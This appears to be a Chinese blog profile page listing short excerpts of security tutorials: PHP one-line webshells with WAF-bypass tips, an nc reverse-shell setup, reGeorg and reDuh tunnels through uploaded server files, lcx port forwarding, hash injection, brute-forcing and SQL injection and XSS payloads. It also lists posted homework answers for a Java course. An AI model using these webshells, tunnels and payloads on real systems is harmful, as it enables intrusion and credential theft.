- 博客(61)
- 收藏
- 关注
RSS订阅原创 国开电大《Java语言程序设计》形考任任一~四答案
主要的商品有:冰棍(单价1.5元), 矿泉水(单价2.0元),面包(单价2.5),方便面(单价4.5元),瓶装可乐(单价3.5元)杂物店有各种各样的商品在售卖,请完成一个程序,帮助杂物店的老板计算顾客购买商品的总费用。在程序中输出顾客的名称以及购买商品的详细清单,并给出程序中输出顾客结账时最终的商品总价。在面向对象实现中,创建商品类,然后扩展出方便面的子类,在其中分别定义出各自的折扣逻辑。在程序中输出顾客的名称以及购买的商品详细清单,并给出最终的商品价格。小美:冰棍3个,瓶装可乐2个,方便面1包。
2022-12-19 13:33:29
2333
原创 Spring Cloud Gateway 远程代码执行漏洞 (CVE-2022-22947)
Spring Cloud Gateway 远程代码执行漏洞 (CVE-2022-22947)
2022-06-02 14:50:01
897
原创 DDMS无法看到进程
1.拷贝mprop 到/data/目录下;2.添加权限777;3设置ro.debuggable为1;4.stop;start(重启adbd进程);命令如下:PS adb push .\mprop /data/local/tmp.\mprop: 1 file pushed, 0 skipped. 0.4 MB/s (17712 bytes in 0.038s)PS adb shellsirius:/ $ susirius:/ # cd /data/local/tmpsirius:/da
2021-06-10 15:45:37
165
原创 小米8SE刷机
1.解锁OEMOEM解锁就是启用开发者选项,开启USB调试(开启调试之后可以通过ADB对手机进行一些操作)依次点击 ->设置 ->我的设备 ->全部参数 ->MIUI版本,连续点击7次,即可调出开发者选项:依次点击 ->设置 ->更多设置->开发者选项,然后对选项进行设置2.解锁BL...
2021-05-27 15:47:25
3377
原创 APP测试基本操作
二次打包签名对已经编译发布的apk文件,就是已经使用签名文件进行了正式签名的应用文件进行自己的修改,再次签名打包发布的过程作用:对原来的apk文件的源码进行修改,然后重新编译二次打包后,重新发布测试,达到完美修改别人的apk文件的目的步骤:使用apktool将目标apk文件解包,在PowerShell中输入:java -jar apktool_2.4.1.jar d yimafu.apk注:需要跟apktool在一个文件路径中得到解包后的apk文件使用apktool二次打包,删除原来的签名文.
2020-11-05 09:24:12
245
原创 ActiveMQ任意文件写入漏洞(CVE-2016-3088)
ActiveMQ 简介:•ActiveMQ 是 Apache 软件基金会下的一个开源消息驱动中间件软件。Jetty 是一个开源的 servlet 容器,它为基于 Java 的 web 容器,例如 JSP 和 servlet 提供运行环境。ActiveMQ 5.0 及以后版本默认集成了jetty。在启动后提供一个监控 ActiveMQ 的 Web 应用漏洞描述:•filese...
2020-05-05 18:26:40
306
原创 mssql注入实验
连接mssql源码<?php $conn = sqlsrv_connect('localhost',array('Database' => 'test','UID' => 'sa','PWD' => '123.com')); if($conn == false){ var_dump(sqlsrv_errors()); ex...
2020-04-19 15:15:24
335
原创 使用brutespray暴力破解FTP密码
扫描工具:nmap字典制作工具:cupp安装:git clone https://github.com/Mebus/cupp.git暴力破解工具:brutespray安装:apt-get install brutespray1.用nmap扫描目标IP的21端口,并将结果以xml的形式进行保存。nmap -sS -p21 目标IP -oX 21.xml2.在Python环境下,用c...
2020-03-31 15:53:05
1012
原创 wce实现hash注入
原理:hash注入的原理是将我们预备好的目标机器的本地或者是域用户hash注入到本地的认证进程lsass.exe中去,使得本地在使用ipc登录目标机器的时候就如同自己登录自己的机器一样获得权限。至于目标机器的本地或者是域用户hash如何取得那就要发挥你自己的想象力了,hash注入本身是为了对付那些破解不了的NTLM HASH。操作:1.先使用wce获取一台内网机器的hash值,太复杂无...
2020-03-29 21:53:13
748
原创 nmap工具进行端口扫描
简介Nmap (“Network Mapper(网络映射器)”) 是一款开放源代码的 网络探测和安全审核的工具。它的设计目标是快速地扫描大型网络,当然用它扫描单个 主机也没有问题。Nmap以新颖的方式使用原始IP报文来发现网络上有哪些主机,那些 主机提供什么服务(应用程序名和版本),那些服务运行在什么操作系统(包括版本信息), 它们使用什么类型的报文过滤器/防火墙,以及一堆其它功能。虽然Nmap...
2020-03-23 19:15:49
1199
原创 PHP一句话木马及绕waf思路
PHP一句话木马:1 .eval():<?php @eval($_POST['-7']); ?> eval函数将接受的字符串当做代码执行。2.assert():<?php @assert ($_POST['-7']); ?>assert函数将接受的字符串当做代码执行 。3.preg_replace():<?php @preg_replace("/...
2020-03-23 13:05:22
2044
原创 使用Earthworm (EW) 做Socks5代理
正向代理我们常说的代理就是指正向代理,正向代理的过程,它隐藏了真实的请求客户端,服务端不知道真实的客户端是谁,客户端请求的服务都被代理服务器代替来请求。举个例子在国内用浏览器访问 www.google.com 时,因为防火墙的原因拒绝连接,这时候你可以在国外搭建一台代理服务器,让代理帮你去请求google.com,代理把请求返回的相应结构再返回给我。反向代理反向代理是相对于服务器而言的,...
2020-03-21 17:27:26
3817
原创 Linux开启ftp
Linux应该默认不安装ftp的,所以需要自己安装。直接:apt-get install vsftpd 然后开启ftp服务service vsftpd startservice vsftp status 查看状态service vsftp stop 停止服务service vsftpd restart 重新启动服务ftp的配置文件:/etc/vsftpd.conf如果你想roo...
2020-03-21 16:06:26
581
2
原创 工具reGeorg(http隧道)
1.上传reGeorg里合适的tunnel到边缘服务器2.攻击机输入命令python reGeorgSocksProxy.py -u http://192.168.1.102/conn.aspx (上传地址)3.攻击机输入vim /etc/proxychains.conf ,按里面的说明进行设置proxychainssocks5 127.0.0.1 88884.使用proxycha...
2020-03-20 22:20:07
3063
原创 reduh端口转发工具使用介绍
将reDuhServers\reDuh.aspx上传到网站目录2.攻击机使用reDuhClient\dist\reDuhClient.jar连接刚刚上传的reDuh.aspx文件,会在本地生成一个1010端口java -jar reDuhClient.jar http://192.168.1.105/reDuh.aspx3.攻击机使用nc连接本地的1010端口nc1.exe -...
2020-03-20 20:21:34
772
原创 搭建DHCP服务器
实验环境:vm环境下,自定义同一局域网,一台win7,两台win3(win3-1,win-2),win3-1搭建DHCP服务器,win3-2获取win3-1搭建DHCP服务器,win7获取win3-1搭建DHCP服务器并设置保留地址。1.以win3-1搭建DHCP,首先固定IP地址,自定义192.168.1.12,在【开始】里找到【管理您的服务器】3.点击打开,找到【添加或删除角色】...
2020-03-20 00:14:22
747
原创 Burp Suite抓取安卓手机数据包(HTTPS)
1、电脑放热点,然后用手机连接热点。打开手机网络设置,长按连接的无线网络名称,修改网络。高级设置—代理—在服务器主机名输入主机IP地址,端口设置8080。2、设置Burp 监听端口,可以选择All interfaces,或者也可以选择Spercific interfaces——设置主机IP地址,端口8080。3、在Burp–>procy–>option–>edit设置监听主...
2020-03-19 17:18:31
3292
2
原创 利用nc反弹shell实验
反弹shell反弹shell(reverse shell),就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。利用nc正向连接shell实验步骤一:被控服务器shell反弹到本地的4444端口,并监听4444端口nc –lvp 44...
2020-03-19 17:08:45
1152
原创 metasploit-framework(MSF)工具的使用
初始化metasploit-frameworkmsfconsole查看payload模块show payloads使用payload:windows/x64/pingback_reverse_tcp,查看payload选项use windows/x64/pingback_reverse_tcpshow options另打开一个终端,制作windows/x64/pingbac...
2020-03-18 21:30:58
1073
1
原创 reduh-maste工具的使用
1.将reDuhServers\reDuh.aspx上传到网站目录2.攻击机使用reDuhClient\dist\reDuhClient.jar连接刚刚上传的reDuh.aspx文件,会在本地生成一个1010端口java -jar reDuhClient.jar http://192.168.1.105/reDuh.aspx3.攻击机使用nc连接本地的1010端口nc1.exe -...
2020-03-18 19:21:48
543
原创 lcx实现端口转发
LCX转发实验一环境:内网3389端口不对外开放,但是1234端口对外开放(正向连接) lcx .exe –tran 1234 127.0.0.1 3389过程:192.168.1.105: 1234 -> 3389LCX转发实验二环境:内网主机可以访问外网80端口,同时3389端口只内网访问(反向连接)步骤一:外网服务器开启监听lcx.exe -listen 80 5...
2020-03-18 18:01:44
962
原创 IP头、TCP头、UDP头详解
一、计算机网络模型基础为了方便讲述计算机原理,通常将OIS与TCP/IP结合为五层来讲,如图:**物理层:**主要用来规定电气特性的,必须按照标准使用哪些硬件。例如,调制解调器、PLC 、SONET/SDH 、G.709 、光导纤维、 同轴电缆、双绞线 ,其中数据单元是比特,典型设备有:中继器,集线器、网线、HUB**数据链路层:**有ARQ、CSMA/CD、PPP、LCP、HDLC、ATM...
2020-03-18 10:36:20
816
原创 Kali 新版本msfconsole启动失败问题
metasploit-framework安装1.一条代码就可以安装了apt-get install metasploit-framework2.安装完成后,首先启动postgresql数据库:/etc/init.d/postgresql start或者 service postgresql start3. 设置postgresql开机自启update-rc.d postgresql ...
2020-03-16 20:42:39
5325
6
原创 BurpSuit暴力破解密码
暴力破解原理暴力破解是用户自定义字典文件中的内容与验证程序交互,从而在枚举过程中得到正确数据案例:破解用户名、密码破解验证码-之前四位数的手机验证码在未进行任何防护措施,导致被枚举出来暴力破解的基础应用程序或服务器未进行限制具有内容涵盖全方面的字典文件暴力破解方式根据破解的验证码内容是否处于服务状态将暴力破解分为以下两类:1.在线破解2.离线破解无论是在线还是离线是否可以...
2020-03-15 22:13:02
2307
原创 了解SSRF漏洞
Ssrf漏洞原理ssrf形成的原因:很多web应用都提供了从其他的服务器上获取数据的功能。使用用户指定的URL,web应用可以获取图片,下载文件,读取文件内容等。这个功能如果被恶意使用,可以利用存在缺陷的web应用作为代理攻击远程和本地的服务器。这种形式的攻击称为服务器请求伪造攻击(Server-side Request Forgery)。主要方式:1对外网、服务器所在内网、本地进行端口扫描...
2020-03-15 14:20:36
600
原创 IIS6.0解析漏洞
ISS6.0解析漏洞介绍(1) 当建立*.asa、.asp格式的文件夹时,其目录下的任意文件都将被IIS当作为asp文件解析。(2) 当文件.asp;*.jpg IIS6.0同样会将文件当做asp文件解析。注:微软目前也没有推出补丁,不认为是一个漏洞ISS6.0 PUT上传原理WeDAV基于HTTP1.1协议的通信协议使得HTTP支持PUT MOVE COPY DELETE方法。1.在...
2020-03-14 18:13:09
3884
原创 了解xxe
漏洞介绍XXE全称XML External Entity Injection,也就是XML外部实体注入攻击,漏洞是对非安全的外部实体数据进行处理时引发的安全问题。要了解XXE,就必须懂得XML的一些规则。XML是用于标记电子文件使其具有结构性的标记语言,可以用来标记数据、定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言。XML文档结构包括XML声明、DTD文档类型定义(可选)、文档...
2020-03-13 12:10:15
476
原创 XSS Challenges部分题目总结
xss-quiz.int21h.jp1.没有过滤的xss<script>alert(document.domain);</script>属性中的xss设置独一无二的字符串如:“yyy”,方便查找值在代码中的结果"><script>alert(document.domain);</script>3. 选择列表中的xss...
2020-03-09 22:36:44
601
原创 xss漏洞基础
xss介绍跨站脚本攻击一-XSS (Cross Site Script),指的是攻击者往Web页面或者URL里插入恶意JavaScript脚本代码,如果Web应用程序对于用户输入的内容没有过滤,那么当正常用户浏览该网页的时候,嵌入在Web页面里的恶意JavaScript脚本代码会被执行,从而达到恶意攻击正常用户的目的。攻击方式XSS攻击的代码是javas代码xss一般情况是植入到url或者...
2020-03-08 11:40:30
406
原创 sql注入-sqlmap的使用方法
获取一个url:http://localhost/sqli-labs-master/Less-1/?id=1判断是否有注入:python sqlmap.py –u “http://localhost/sqli-labs-master/Less-1/?id=1”get型注入查看所有数据库:python sqlmap.py –u “http://localhost/sqli-labs-mast...
2020-03-07 19:00:29
660
原创 sql注入-mysql注入四种基本手法
union类型的sql注入(联合查询注入)条件:页面必须有显示位实际操作测出页面异常‘ “ ) ‘) “) ‘)) “)) `判断列数:1’ order by 3-- -不存在返回错误判断显示位:-1’ union select 1,2,3-- -查看数据库:-1’ union select user(),database(),version()-- -查看数据库...
2020-03-05 15:46:27
1753
原创 Shodan搜索引擎使用技巧
Shodan介绍Shodan首页网址:https://www.shodan.io/Shodan用户注册网址:https://account.shodan.io/registerShodan用户登录查看生成二维码和API Key码Shodan搜索技巧输入IP地址进行信息搜索通过关键字port指定具体端口号。列如:port:22shodan命令行使用kali安装shodan命...
2020-03-03 13:42:37
14463
国开电大《Java语言程序设计》形考任务答案1~4
2022-12-19
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人